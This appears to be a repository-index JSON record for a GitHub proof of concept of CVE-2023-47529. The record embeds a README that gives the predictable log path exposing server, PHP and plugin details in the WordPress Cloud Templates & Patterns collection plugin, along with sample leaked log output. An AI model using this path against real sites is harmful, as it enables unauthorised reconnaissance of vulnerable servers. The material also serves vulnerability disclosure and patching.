{"id":21125718,"url":"https://github.com/randomrobbiebf/cve-2023-47529","last_synced_at":"2026-03-19T19:01:38.928Z","repository":{"id":206957520,"uuid":"718085174","full_name":"RandomRobbieBF/CVE-2023-47529","owner":"RandomRobbieBF","description":"Cloud Templates \u0026 Patterns collection \u003c= 1.2.2 - Sensitive Information Exposure via Log File","archived":false,"fork":false,"pushed_at":"2023-11-13T10:51:54.000Z","size":3,"stargazers_count":1,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-03-14T11:41:38.525Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/RandomRobbieBF.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2023-11-13T10:50:25.000Z","updated_at":"2023-11-15T00:30:33.000Z","dependencies_parsed_at":null,"dependency_job_id":"ba556c27-d848-437a-aca1-b92517c1e0f5","html_url":"https://github.com/RandomRobbieBF/CVE-2023-47529","commit_stats":null,"previous_names":["randomrobbiebf/cve-2023-47529"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/RandomRobbieBF/CVE-2023-47529","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2023-47529","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2023-47529/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2023-47529/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2023-47529/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/RandomRobbieBF","download_url":"https://codeload.github.com/RandomRobbieBF/CVE-2023-47529/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2023-47529/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":266737575,"owners_count":23976389,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-07-23T02:00:09.312Z","response_time":66,"last_error":null,"robots_txt_status":null,"robots_txt_updated_at":null,"robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-11-20T04:36:32.199Z","updated_at":"2026-02-05T20:33:42.302Z","avatar_url":"https://github.com/RandomRobbieBF.png","language":null,"funding_links":[],"categories":[],"sub_categories":[],"readme":"# CVE-2023-47529\nCloud Templates \u0026amp; Patterns collection \u0026lt;= 1.2.2 - Sensitive Information Exposure via Log File\n\n```\nDescription:\nThe Cloud Templates \u0026 Patterns collection plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.2.2 via a log file with a predictable name. This makes it possible for unauthenticated attackers to extract sensitive data.\nSeverity: medium\nCVE ID: CVE-2023-47529\nCVSS Score: 5.3\nCVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\nPlugin Slug: templates-patterns-collection\nWPScan URL: https://www.wpscan.com/plugin/templates-patterns-collection\nReference URL: https://www.wordfence.com/threat-intel/vulnerabilities/id/c59baad8-b888-4475-8371-645811a6b569\n```\n\nPOC\n---\n\n`/wp-content/uploads/ti_theme_onboarding.log`\n\n```\n[16/Jan/2022:19:09:48] (I): WordPress Instance Info:\n[16/Jan/2022:19:09:48] (I): Home URL : http://localhost/wordpress\n[16/Jan/2022:19:09:48] (I): Site URL : http://localhost/wordpress\n[16/Jan/2022:19:09:48] (I): WordPress Version : 5.8.3\n[16/Jan/2022:19:09:48] (I): Onboarding Version : 1.1.20\n[16/Jan/2022:19:09:48] (I): Multisite : No\n[16/Jan/2022:19:09:48] (I): Server Info : Apache/2.4.51 (Win64) PHP/7.4.26\n[16/Jan/2022:19:09:48] (I): PHP Version : 7.4.26\n[16/Jan/2022:19:09:48] (I): HTTPS : No\n[16/Jan/2022:19:09:48] (I): PHP Max Execution Time : 120\n[16/Jan/2022:19:09:48] (I): PHP Max Input Vars : 2500\n[16/Jan/2022:19:09:48] (I): Max Upload Size : 2097152\n[16/Jan/2022:19:09:48] (I): Plugins:\n[16/Jan/2022:19:09:48] (I): [PLUGIN] Memberlite Elements : v1.0.5 (Stranger Studios)\n[16/Jan/2022:19:09:48] (I): [PLUGIN] Simply Schedule Appointments : v1.5.2.1 (N squared)\n[16/Jan/2022:19:09:48] (I): [PLUGIN] Templates Patterns Collection : v1.1.20 (ThemeIsle)\n[16/Jan/2022:19:09:48] (I): [PLUGIN] User Notes : v1.0.2 (Cartpauj)\n[16/Jan/2022:19:09:48] (I): [PLUGIN] WooCommerce : v6.1.0 (Automattic)\n[16/Jan/2022:19:09:48] (I): [PLUGIN] 3CX Live Chat : v9.4.1 (3CX)\n[16/Jan/2022:19:09:48] (I): [PLUGIN] WPForms Lite : v1.7.2 (WPForms)\n[16/Jan/2022:19:09:48] (I): [PLUGIN] Jetpack CRM : v4.7.0 (Automattic)\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frandomrobbiebf%2Fcve-2023-47529","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Frandomrobbiebf%2Fcve-2023-47529","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frandomrobbiebf%2Fcve-2023-47529/lists"}